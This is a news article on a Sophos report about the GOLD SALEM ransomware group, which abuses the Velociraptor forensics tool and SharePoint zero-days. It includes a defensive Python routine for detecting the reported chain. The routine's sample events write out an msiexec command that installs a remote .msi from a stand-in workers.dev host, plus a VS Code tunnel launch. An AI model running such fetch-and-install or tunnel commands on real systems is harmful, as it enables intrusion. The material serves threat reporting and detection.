A sophisticated cybercriminal group has been observed repurposing a legitimate digital forensics tool as a precursor for ransomware attacks, marking a concerning innovation in threat actor tactics. A new report from the Counter Threat Unit (CTU) Research Team at Sophos details how the group, tracked as GOLD SALEM, is using the open-source Velociraptor tool to facilitate intrusions that ultimately deploy the Warlock ransomware.
Velociraptor is widely recognized in the cybersecurity industry as a powerful tool for digital forensics and incident response (DFIR), used by defenders to hunt for threats and collect evidence. However, since mid-August 2025, CTU researchers have identified its abuse in “likely ransomware precursor activity”.
In observed incidents, the threat actors downloaded the Velociraptor installer (often named v2.msi or v3.msi) from attacker-controlled subdomains on workers.dev. Once installed, the tool was used to execute malicious commands, including installing Visual Studio Code in tunnel mode to establish command-and-control (C2) channels.
“While Velociraptor is a legitimate, off-the-shelf tool used for digital forensics and incident response, its download from attacker-controlled infrastructure indicates malicious use,” the report notes. This “living off the land” approach allows attackers to blend their activities with legitimate administrative tasks, complicating detection efforts.
The group’s initial access methods are equally aggressive. In several incidents, GOLD SALEM exploited zero-day vulnerabilities in on-premises SharePoint servers, a technique Microsoft refers to as “ToolShell.”
In one notable August intrusion, a compromised SharePoint process (w3wp.exe) spawned an installer (msiexec.exe) that fetched the malicious Velociraptor payload directly from an attacker’s Cloudflare Worker domain. This demonstrates the group’s ability to chain vulnerability exploitation with post-compromise tooling rapidly.
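As an added illustration of the chain described in the two paragraphs above (not code from the report or from Sophos), the following Python triage routine flags process-creation events that match it: w3wp.exe spawning msiexec.exe, msiexec.exe pulling an .msi from a workers.dev host, and a Velociraptor process launching a VS Code tunnel. The event schema, the file paths, the sample events and the Velociraptor.exe binary name are assumptions made for the example.

```python
from urllib.parse import urlparse

# Constructed sample process-creation events (not taken from the report).
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i https://example-sub.workers.dev/v2.msi /qn"},
    {"id": 2, "parent": r"C:\Program Files\Velociraptor\Velociraptor.exe",  # assumed binary name
     "image": r"C:\Program Files\Microsoft VS Code\code.exe",
     "cmdline": "code.exe tunnel --accept-server-license-terms"},
    {"id": 3, "parent": r"C:\Windows\explorer.exe",  # benign local install, must not be flagged
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\admin\Downloads\7zip.msi /qn"},
]

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def remote_msi_host(cmdline):
    """Return the host if the command line references an http(s) URL ending in .msi, else None."""
    for token in cmdline.split():
        token = token.strip('"')
        if token.lower().startswith(("http://", "https://")):
            parsed = urlparse(token)
            if parsed.path.lower().endswith(".msi"):
                return parsed.hostname
    return None

def analyse(event):
    """Return the list of reasons an event looks like the reported Velociraptor abuse chain."""
    reasons = []
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    if parent == "w3wp.exe" and image == "msiexec.exe":
        reasons.append("sharepoint worker process spawned msiexec")
    if image == "msiexec.exe":
        host = remote_msi_host(cmd)
        if host and host.endswith(".workers.dev"):
            reasons.append("msiexec installing .msi from workers.dev")
    if parent == "velociraptor.exe" and image == "code.exe" and "tunnel" in cmd.lower().split():
        reasons.append("velociraptor spawned vs code tunnel")
    return reasons

def flag_suspicious(events):
    """Map event id -> reasons for every event that matches at least one indicator."""
    flagged = {}
    for event in events:
        reasons = analyse(event)
        if reasons:
            flagged[event["id"]] = reasons
    return flagged
```

Each check is a hunting heuristic rather than a verdict: a SharePoint worker spawning an installer or an MSI fetched from a Cloudflare Workers host warrants review of where the binary came from, which is the distinction the report draws between legitimate and malicious Velociraptor use.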
While the end goal appears to be financial extortion, GOLD SALEM’s ransomware toolkit is diverse. Researchers observed the group deploying Warlock, LockBit 3.0, and Babuk variants.
Warlock, likely based on leaked LockBit 3.0 code, typically appends extensions like .x2anylock to encrypted files. Interestingly, the group’s victimology suggests motives beyond simple profit. The target list includes organizations in telecommunications, nuclear energy, and aerospace—sectors that “would be of interest to Chinese state-sponsored groups involved in intelligence gathering and cyberespionage”.
CTU researchers link GOLD SALEM to a China-based threat cluster Microsoft tracks as Storm-2603. While the group appears financially motivated, their use of tools like Cloudflare Workers and specific vulnerable drivers (rsndispot.sys signed by Beijing Rising Network Security) aligns with tactics common among Chinese threat actors.
The report states that “CTU assess with low confidence that GOLD SALEM is at least partially composed of Chinese individuals,” citing the group’s willingness to attack targets in Russia and Taiwan as further evidence.
Organizations are urged to evaluate the necessity of exposing SharePoint servers to the internet and to ensure all internet-facing systems are patched against known exploits like ToolShell. Furthermore, “broad and comprehensive deployment of AV and EDR solutions have been effective at detecting this threat group’s activity at an early stage”.